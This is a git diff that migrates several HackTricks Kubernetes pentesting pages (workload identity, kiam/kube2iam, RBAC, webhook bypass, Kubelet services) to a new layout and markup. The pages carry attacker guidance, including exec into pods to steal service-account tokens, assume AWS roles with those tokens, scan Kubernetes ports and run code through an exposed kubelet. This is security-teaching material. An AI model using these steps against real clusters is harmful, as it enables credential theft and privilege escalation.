@@ -69,28 +54,23 @@ With Workload Identity, we can configure a[ Kubernetes service account](https:// The **first series of steps** to enable this behaviour is to **enable Workload Identity in GCP** ([**steps**](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)) and create the GCP SA you want k8s to impersonate. -* **Enable Workload Identity** on a new cluster +- **Enable Workload Identity** on a new cluster -{% code overflow="wrap" %} ```bash gcloud container clusters update \ --region=us-central1 \ --workload-pool=.svc.id.goog ``` -{% endcode %} -* **Create/Update a new nodepool** (Autopilot clusters don't need this) +- **Create/Update a new nodepool** (Autopilot clusters don't need this) -{% code overflow="wrap" %} ```bash # You could update instead of create gcloud container node-pools create --cluster= --workload-metadata=GKE_METADATA --region=us-central1 ``` -{% endcode %} -* Create the **GCP Service Account to impersonate** from K8s with GCP permissions: +- Create the **GCP Service Account to impersonate** from K8s with GCP permissions: -{% code overflow="wrap" %} ```bash # Create SA called "gsa2ksa" gcloud iam service-accounts create gsa2ksa --project= @@ -100,11 +80,9 @@ gcloud projects add-iam-policy-binding \ --member "serviceAccount:gsa2ksa@.iam.gserviceaccount.com" \ --role "roles/iam.securityReviewer" ``` -{% endcode %} -* **Connect** to the **cluster** and **create** the **service account** to use +- **Connect** to the **cluster** and **create** the **service account** to use -{% code overflow="wrap" %} ```bash # Get k8s creds gcloud container clusters get-credentials --region=us-central1 
@@ -115,11 +93,9 @@ kubectl create namespace testing # Create the KSA kubectl create serviceaccount ksa2gcp -n testing ``` -{% endcode %} -* **Bind the GSA with the KSA** +- **Bind the GSA with the KSA** -{% code overflow="wrap" %} ```bash # Allow the KSA to access the GSA in GCP IAM gcloud iam service-accounts add-iam-policy-binding gsa2ksa@ [!WARNING] +> As an attacker inside K8s you should **search for SAs** with the **`iam.gke.io/gcp-service-account` annotation** as that indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access.\ +> From GCP is always interesting to enumerate the bindings and know **which access are you giving to SAs inside Kubernetes**. This is a script to easily **iterate over the all the pods** definitions **looking** for that **annotation**: @@ -195,18 +167,15 @@ An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://githu First of all you need to configure **which roles can be accessed inside the namespace**, and you do that with an annotation inside the namespace object: -{% code title="Kiam" %} -```yaml +```yaml:Kiam kind: Namespace metadata: name: iam-example annotations: iam.amazonaws.com/permitted: ".*" ``` -{% endcode %} -{% code title="Kube2iam" %} -```yaml +```yaml:Kube2iam apiVersion: v1 kind: Namespace metadata: @@ -215,12 +184,10 @@ metadata: ["role-arn"] name: default ``` -{% endcode %} Once the namespace is configured with the IAM roles the Pods can have you can **indicate the role you want on each pod definition with something like**: -{% code title="Kiam & Kube2iam" %} -```yaml +```yaml:Kiam & Kube2iam kind: Pod metadata: name: foo 
@@ -228,17 +195,14 @@ metadata: annotations: iam.amazonaws.com/role: reportingdb-reader ``` -{% endcode %} -{% hint style="warning" %} -As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles). -{% endhint %} +> [!WARNING] +> As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles). #### Create Pod with IAM Role -{% hint style="info" %} -The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it. -{% endhint %} +> [!NOTE] +> The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it. ```yaml echo 'apiVersion: v1 
@@ -284,27 +248,23 @@ kubectl annotate serviceaccount -n $namespace $service_account eks.amazonaws.com To **get aws using the token** from `/var/run/secrets/eks.amazonaws.com/serviceaccount/token` run: -{% code overflow="wrap" %} ```bash aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/EKSOIDCTesting --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token ``` -{% endcode %} -{% hint style="warning" %} -As an attacker, if you can enumerate a K8s cluster, check for **service accounts with that annotation** to **escalate to AWS**. To do so, just **exec/create** a **pod** using one of the IAM **privileged service accounts** and steal the token. +> [!WARNING] +> As an attacker, if you can enumerate a K8s cluster, check for **service accounts with that annotation** to **escalate to AWS**. To do so, just **exec/create** a **pod** using one of the IAM **privileged service accounts** and steal the token. +> +> Moreover, if you are inside a pod, check for env variables like **AWS_ROLE_ARN** and **AWS_WEB_IDENTITY_TOKEN.** -Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN** and **AWS\_WEB\_IDENTITY\_TOKEN.** -{% endhint %} +> [!CAUTION] +> Sometimes the **Turst Policy of a role** might be **bad configured** and instead of giving AssumeRole access to the expected service account, it gives it to **all the service accounts**. Therefore, if you are capable of write an annotation on a controlled service account, you can access the role. +> +> Check the **following page for more information**: -{% hint style="danger" %} -Sometimes the **Turst Policy of a role** might be **bad configured** and instead of giving AssumeRole access to the expected service account, it gives it to **all the service accounts**. Therefore, if you are capable of write an annotation on a controlled service account, you can access the role. 
- -Check the **following page for more information**: -{% endhint %} - -{% content-ref url="../aws-security/aws-basic-information/aws-federation-abuse.md" %} -[aws-federation-abuse.md](../aws-security/aws-basic-information/aws-federation-abuse.md) -{% endcontent-ref %} +{{#ref}} +../aws-security/aws-basic-information/aws-federation-abuse.md +{{#endref}} ### Find Pods a SAs with IAM Roles in the Cluster @@ -356,21 +316,8 @@ fi ## References -* [https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity) -* [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c) -* [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/) +- [https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity](https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity) +- [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c) +- [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md b/src/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md similarity index 62% rename from pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md index 4c5e3aa00..037697582 100644 --- a/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md @@ -1,19 +1,6 @@ # Kubernetes Role-Based Access Control(RBAC) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Role-Based Access Control (RBAC) @@ -29,9 +16,9 @@ RBAC’s permission model is built from **three individual parts**: The difference between “**Roles**” and “**ClusterRoles**” is just where the role will be applied – a “**Role**” will grant access to only **one** **specific** **namespace**, while a “**ClusterRole**” can be used in **all namespaces** in the cluster. Moreover, **ClusterRoles** can also grant access to: -* **cluster-scoped** resources (like nodes). -* **non-resource** endpoints (like /healthz). -* namespaced resources (like Pods), **across all namespaces**. +- **cluster-scoped** resources (like nodes). +- **non-resource** endpoints (like /healthz). +- namespaced resources (like Pods), **across all namespaces**. From **Kubernetes** 1.6 onwards, **RBAC** policies are **enabled by default**. But to enable RBAC you can use something like: 
@@ -43,9 +30,9 @@ kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options In the template of a **Role** or a **ClusterRole** you will need to indicate the **name of the role**, the **namespace** (in roles) and then the **apiGroups**, **resources** and **verbs** of the role: -* The **apiGroups** is an array that contains the different **API namespaces** that this rule applies to. For example, a Pod definition uses apiVersion: v1. _It can has values such as rbac.authorization.k8s.io or \[\*]_. -* The **resources** is an array that defines **which resources this rule applies to**. You can find all the resources with: `kubectl api-resources --namespaced=true` -* The **verbs** is an array that contains the **allowed verbs**. The verb in Kubernetes defines the **type of action** you need to apply to the resource. For example, the list verb is used against collections while "get" is used against a single resource. +- The **apiGroups** is an array that contains the different **API namespaces** that this rule applies to. For example, a Pod definition uses apiVersion: v1. _It can has values such as rbac.authorization.k8s.io or \[\*]_. +- The **resources** is an array that defines **which resources this rule applies to**. You can find all the resources with: `kubectl api-resources --namespaced=true` +- The **verbs** is an array that contains the **allowed verbs**. The verb in Kubernetes defines the **type of action** you need to apply to the resource. For example, the list verb is used against collections while "get" is used against a single resource. ### Rules Verbs 
@@ -61,46 +48,41 @@ In the template of a **Role** or a **ClusterRole** you will need to indicate the Kubernetes sometimes checks authorization for additional permissions using specialized verbs. For example: -* [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) - * `use` verb on `podsecuritypolicies` resources in the `policy` API group. -* [RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) - * `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group. -* [Authentication](https://kubernetes.io/docs/reference/access-authn-authz/authentication/) - * `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group. +- [PodSecurityPolicy](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) + - `use` verb on `podsecuritypolicies` resources in the `policy` API group. +- [RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) + - `bind` and `escalate` verbs on `roles` and `clusterroles` resources in the `rbac.authorization.k8s.io` API group. +- [Authentication](https://kubernetes.io/docs/reference/access-authn-authz/authentication/) + - `impersonate` verb on `users`, `groups`, and `serviceaccounts` in the core API group, and the `userextras` in the `authentication.k8s.io` API group. 
-{% hint style="warning" %} -You can find **all the verbs that each resource support** executing `kubectl api-resources --sort-by name -o wide` -{% endhint %} +> [!WARNING] +> You can find **all the verbs that each resource support** executing `kubectl api-resources --sort-by name -o wide` ### Examples -{% code title="Role" %} -```yaml +```yaml:Role apiVersion: rbac.authorization.k8s.io/v1 kind: Role metadata: namespace: defaultGreen name: pod-and-pod-logs-reader rules: -- apiGroups: [""] - resources: ["pods", "pods/log"] - verbs: ["get", "list", "watch"] + - apiGroups: [""] + resources: ["pods", "pods/log"] + verbs: ["get", "list", "watch"] ``` -{% endcode %} -{% code title="ClusterRole" %} -```yaml +```yaml:ClusterRole apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRole metadata: # "namespace" omitted since ClusterRoles are not namespaced name: secret-reader rules: -- apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "watch", "list"] + - apiGroups: [""] + resources: ["secrets"] + verbs: ["get", "watch", "list"] ``` -{% endcode %} For example you can use a **ClusterRole** to allow a particular user to run: @@ -112,8 +94,7 @@ kubectl get pods --all-namespaces [**From the docs:**](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#rolebinding-and-clusterrolebinding) A **role binding grants the permissions defined in a role to a user or set of users**. It holds a list of subjects (users, groups, or service accounts), and a reference to the role being granted. A **RoleBinding** grants permissions within a specific **namespace** whereas a **ClusterRoleBinding** grants that access **cluster-wide**. -{% code title="" %} -```yaml +```yaml:RoleBinding piVersion: rbac.authorization.k8s.io/v1 # This role binding allows "jane" to read pods in the "default" namespace. # You need to already have a Role named "pod-reader" in that namespace. 
@@ -122,35 +103,32 @@ metadata: name: read-pods namespace: default subjects: -# You can specify more than one "subject" -- kind: User - name: jane # "name" is case sensitive - apiGroup: rbac.authorization.k8s.io + # You can specify more than one "subject" + - kind: User + name: jane # "name" is case sensitive + apiGroup: rbac.authorization.k8s.io roleRef: # "roleRef" specifies the binding to a Role / ClusterRole kind: Role #this must be Role or ClusterRole name: pod-reader # this must match the name of the Role or ClusterRole you wish to bind to apiGroup: rbac.authorization.k8s.io ``` -{% endcode %} -{% code title="ClusterRoleBinding" %} -```yaml +```yaml:ClusterRoleBinding apiVersion: rbac.authorization.k8s.io/v1 # This cluster role binding allows anyone in the "manager" group to read secrets in any namespace. kind: ClusterRoleBinding metadata: name: read-secrets-global subjects: -- kind: Group - name: manager # Name is case sensitive - apiGroup: rbac.authorization.k8s.io + - kind: Group + name: manager # Name is case sensitive + apiGroup: rbac.authorization.k8s.io roleRef: kind: ClusterRole name: secret-reader apiGroup: rbac.authorization.k8s.io ``` -{% endcode %} **Permissions are additive** so if you have a clusterRole with “list” and “delete” secrets you can add it with a Role with “get”. So be aware and test always your roles and permissions and **specify what is ALLOWED, because everything is DENIED by default.** 
@@ -180,21 +158,8 @@ kubectl describe rolebindings ### Abuse Role/ClusterRoles for Privilege Escalation -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} +{{#ref}} +abusing-roles-clusterroles-in-kubernetes/ +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md similarity index 80% rename from pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md index 512cbbab3..90c7e4173 100644 --- a/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md @@ -26,25 +26,23 @@ webhook: url: https://example.com/webhook serviceAccountName: example-service-account rules: - - apiGroups: - - "" - apiVersions: - - "*" - operations: - - CREATE - - UPDATE - resources: - - pods + - apiGroups: + - "" + apiVersions: + - "*" + operations: + - CREATE + - UPDATE + resources: + - pods ``` The main difference between a ValidatingWebhookConfiguration and policies : +

Kyverno.png

- -

Kyverno.png

- -* **ValidatingWebhookConfiguration (VWC)** : A Kubernetes resource that defines a validating webhook, which is a server-side component that validates incoming Kubernetes API requests against a set of predefined rules and constraints. -* **Kyverno ClusterPolicy**: A policy definition that specifies a set of rules and constraints for validating and enforcing Kubernetes resources, such as pods, deployments, and services +- **ValidatingWebhookConfiguration (VWC)** : A Kubernetes resource that defines a validating webhook, which is a server-side component that validates incoming Kubernetes API requests against a set of predefined rules and constraints. +- **Kyverno ClusterPolicy**: A policy definition that specifies a set of rules and constraints for validating and enforcing Kubernetes resources, such as pods, deployments, and services ## Enumeration @@ -76,15 +74,15 @@ Now, identify the following output : ```yaml namespaceSelector: - matchExpressions: + matchExpressions: - key: kubernetes.io/metadata.name operator: NotIn values: - - default - - TEST - - YOYO - - kube-system - - MYAPP + - default + - TEST + - YOYO + - kube-system + - MYAPP ``` Here, `kubernetes.io/metadata.name` label refers to the namespace name. Namespaces with names in the `values` list will be excluded from the policy : 
@@ -93,12 +91,12 @@ Check namespaces existence. Sometimes, due to automation or misconfiguration, so The goal of this attack is to exploit **misconfiguration** inside VWC in order to bypass operators restrictions and then elevate your privileges with other techniques -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} +{{#ref}} +abusing-roles-clusterroles-in-kubernetes/ +{{#endref}} ## References -* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper) -* [https://kyverno.io/](https://kyverno.io/) -* [https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/) +- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper) +- [https://kyverno.io/](https://kyverno.io/) +- [https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/](https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/) diff --git a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md similarity index 70% rename from pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md rename to src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md index a12955aa1..a2a89e01b 100644 --- a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md +++ b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md 
@@ -1,19 +1,6 @@ # Pentesting Kubernetes Services -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} Kubernetes uses several **specific network services** that you might find **exposed to the Internet** or in an **internal network once you have compromised one pod**. @@ -25,9 +12,9 @@ One way could be searching for `Identity LIKE "k8s.%.com"` in [crt.sh](https://c It might be useful for you to understand how Kubernetes can **expose services publicly** in order to find them: -{% content-ref url="../exposing-services-in-kubernetes.md" %} -[exposing-services-in-kubernetes.md](../exposing-services-in-kubernetes.md) -{% endcontent-ref %} +{{#ref}} +../exposing-services-in-kubernetes.md +{{#endref}} ## Finding Exposed pods via port scanning @@ -52,11 +39,9 @@ The following ports might be open in a Kubernetes cluster: ### Nmap -{% code overflow="wrap" %} ```bash nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 /16 ``` -{% endcode %} ### Kube-apiserver @@ -72,9 +57,9 @@ curl -k https://:(8|6)443/api/v1 **Check the following page to learn how to obtain sensitive data and perform sensitive actions talking to this service:** -{% content-ref url="../kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](../kubernetes-enumeration.md) -{% endcontent-ref %} +{{#ref}} +../kubernetes-enumeration.md +{{#endref}} ### Kubelet API @@ -167,9 +152,9 @@ The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-lin To understand better how the **authentication and authorization of the Kubelet API works** check this page: -{% content-ref url="kubelet-authentication-and-authorization.md" %} -[kubelet-authentication-and-authorization.md](kubelet-authentication-and-authorization.md) -{% endcontent-ref %} +{{#ref}} +kubelet-authentication-and-authorization.md +{{#endref}} The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**: 
@@ -205,9 +190,8 @@ This endpoint allows to execute code inside any container very easily: kubeletctl exec [command] ``` -{% hint style="info" %} -To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level. -{% endhint %} +> [!NOTE] +> To avoid this attack the _**kubelet**_ service should be run with `--anonymous-auth false` and the service should be segregated at the network level. ### **Checking Kubelet (Read Only Port) Information Exposure** @@ -219,21 +203,12 @@ An example of how this vulnerability can be exploited involves a remote attacker ## References -{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2" %} +{{#ref}} +https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2 +{{#endref}} -{% embed url="https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet" %} +{{#ref}} +https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md similarity index 55% rename from pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md rename to src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md index 1c74525af..abcfdccd7 100644 --- a/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md +++ b/src/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md @@ -1,19 +1,6 @@ # Kubelet Authentication & Authorization -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Kubelet Authentication @@ -23,7 +10,7 @@ By default, requests to the kubelet's HTTPS endpoint that are not rejected by ot The **3** authentication **methods** are: -* **Anonymous** (default): Use set setting the param **`--anonymous-auth=true` or the config:** +- **Anonymous** (default): Use set setting the param **`--anonymous-auth=true` or the config:** ```json "authentication": { @@ -32,9 +19,9 @@ The **3** authentication **methods** are: }, ``` -* **Webhook**: This will **enable** the kubectl **API bearer tokens** as authorization (any valid token will be valid). Allow it with: - * ensure the `authentication.k8s.io/v1beta1` API group is enabled in the API server - * start the kubelet with the **`--authentication-token-webhook`** and **`--kubeconfig`** flags or use the following setting: +- **Webhook**: This will **enable** the kubectl **API bearer tokens** as authorization (any valid token will be valid). Allow it with: + - ensure the `authentication.k8s.io/v1beta1` API group is enabled in the API server + - start the kubelet with the **`--authentication-token-webhook`** and **`--kubeconfig`** flags or use the following setting: ```json "authentication": { 
@@ -44,13 +31,12 @@ The **3** authentication **methods** are: }, ``` -{% hint style="info" %} -The kubelet calls the **`TokenReview` API** on the configured API server to **determine user information** from bearer tokens -{% endhint %} +> [!NOTE] +> The kubelet calls the **`TokenReview` API** on the configured API server to **determine user information** from bearer tokens -* **X509 client certificates:** Allow to authenticate via X509 client certs - * see the [apiserver authentication documentation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#x509-client-certs) for more details - * start the kubelet with the `--client-ca-file` flag, providing a CA bundle to verify client certificates with. Or with the config: +- **X509 client certificates:** Allow to authenticate via X509 client certs + - see the [apiserver authentication documentation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#x509-client-certs) for more details + - start the kubelet with the `--client-ca-file` flag, providing a CA bundle to verify client certificates with. Or with the config: ```json "authentication": { @@ -66,9 +52,8 @@ Any request that is successfully authenticated (including an anonymous request) However, the other possible value is **`webhook`** (which is what you will be **mostly finding out there**). This mode will **check the permissions of the authenticated user** to allow or disallow an action. -{% hint style="warning" %} -Note that even if the **anonymous authentication is enabled** the **anonymous access** might **not have any permissions** to perform any action. -{% endhint %} +> [!WARNING] +> Note that even if the **anonymous authentication is enabled** the **anonymous access** might **not have any permissions** to perform any action. The authorization via webhook can be configured using the **param `--authorization-mode=Webhook`** or via the config file with: 
@@ -86,7 +71,7 @@ The kubelet calls the **`SubjectAccessReview`** API on the configured API server The kubelet authorizes API requests using the same [request attributes](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#review-your-request-attributes) approach as the apiserver: -* **Action** +- **Action** | HTTP verb | request verb | | --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- | @@ -96,7 +81,7 @@ The kubelet authorizes API requests using the same [request attributes](https:// | PATCH | patch | | DELETE | delete (for individual resources), deletecollection (for collections) | -* The **resource** talking to the Kubelet api is **always** **nodes** and **subresource** is **determined** from the incoming request's path: +- The **resource** talking to the Kubelet api is **always** **nodes** and **subresource** is **determined** from the incoming request's path: | Kubelet API | resource | subresource | | ------------ | -------- | ----------- | 
@@ -113,25 +98,12 @@ curl -k --header "Authorization: Bearer ${TOKEN}" 'https://172.31.28.172:10250/p Forbidden (user=system:node:ip-172-31-28-172.ec2.internal, verb=get, resource=nodes, subresource=proxy) ``` -* We got a **Forbidden**, so the request **passed the Authentication check**. If not, we would have got just an `Unauthorised` message. -* We can see the **username** (in this case from the token) -* Check how the **resource** was **nodes** and the **subresource** **proxy** (which makes sense with the previous information) +- We got a **Forbidden**, so the request **passed the Authentication check**. If not, we would have got just an `Unauthorised` message. +- We can see the **username** (in this case from the token) +- Check how the **resource** was **nodes** and the **subresource** **proxy** (which makes sense with the previous information) ## References -* [https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/) +- [https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/](https://kubernetes.io/docs/reference/access-authn-authz/kubelet-authn-authz/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
